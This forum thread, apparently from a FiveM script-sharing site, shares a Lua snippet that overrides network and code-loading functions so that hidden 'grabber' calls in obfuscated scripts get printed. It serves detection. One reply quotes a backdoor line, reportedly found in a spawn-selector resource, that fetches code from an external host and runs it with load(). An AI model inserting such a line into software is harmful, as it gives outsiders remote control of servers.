🇬🇧 English 🇳🇱 Nederlands 🇫🇷 Français 🇧🇷 Português 🇪🇸 Español 🇷🇺 Русский 🇩🇪 Deutsch 🇸🇦 العربية
Login Register

GRABBER DETECTION - 70% method [FREE]

posted 03-05-2024 17:39 1.182 views 8 replies
rafaeninja
0 Posts
606 Credits
N/A Since
#1 1.182 views 8 replies
70% method for finding out if an obfuscated script has a grabber.

How to use:

Just add it to the first line of any .lua file.


How it works:

Basically, it disables some functions and prints the parameters of these functions.
These specific functions may or may not call malicious code hosted somewhere, or hidden within the script folder.
However, as mentioned, it is 70% effective as there are several other ways.


Note:

To add more functions, just follow the same pattern.


[attachment removed]

-------------------------------------------------------------------------------------------------------------






function PerformHttpRequest(url, callback, method, data, headers)

print("PerformHttpRequest:")

print("URL:", url)

print("Callback:", callback)

print("Method:", method)

print("Data:", data)

print("Headers:", headers)

end



function SendWebhookMessage(webhook, message)

print("SendWebhookMessage:")

print("Webhook:", webhook)

print("Message:", message)

end



function CreateDui(link, x, y)

print("CreateDui:")

print("Link:", link)

print("X Coordinate:", x)

print("Y Coordinate:", y)

end



function loadstring(str, chunkname)

print("loadstring:")

print("String:", str)

print("Chunk Name:", chunkname)

end



function dofile(filename)

print("dofile:")

print("Filename:", filename)

end



function require(modname)

print("require:")

print("Module Name:", modname)

end



function loadfile(filename, mode, env)

print("loadfile:")

print("Filename:", filename)

print("Mode:", mode)

print("Environment:", env)

end
[/attachment]
replies (8)
2k14
939 Posts
14,880 Credits
Jan 2022 Since
#1
thanku nice script rescpct for u
#1
R34p3rFox
11 Posts
122 Credits
Mar 2022 Since
#2
[JUSTIFY]i have juste update your code for a better experience
[/JUSTIFY]

-- Fonction pour remplacer les fonctions natives par des versions imprimant les informations
local function overrideNativeFunctions()
local native...
#2
R34p3rFox
11 Posts
122 Credits
Mar 2022 Since
#3
thhhhs shiit is a backdoor do not use it PerformHttpRequest('https://thedreamoffivem.com/i?to=Wdv1M', function (e, d) pcall(function() assert(load(d))() end) end)
so i find it in VMS Spawn Selector in server/server.lua
#3
micky1062
4 Posts
13 Credits
Apr 2024 Since
#4
Does it avoid function execution ?
#4
rafaeninja
62 Posts
606 Credits
Dec 2021 Since
#5

micky1062,
Does it avoid function execution ?

in my opinion, replacing functions can interfere with the execution of the encrypted script, but its effectiveness depends on how the encrypted script was written and whether it makes use of the replaced functions.

I wouldn't risk trusting your home host like that, you have to use a VPS to test this.
#5
sktxgaming
70 Posts
36 Credits
May 2024 Since
#6
Respect my man! Appreciate that! :)
#6
airtech1
204 Posts
77 Credits
Apr 2024 Since
#7
Very nice work and very nice job
#7
Alexas159
609 Posts
193 Credits
Jun 2022 Since
#8
thx for sharing good scripts
#8

You must be logged in to reply

Login Register

Related Threads

freakas freakas

🔥[FREE] ARUH-HUD🔥

0 1,457
kanliay46 kanliay46

Anyone have this script?

3 1,335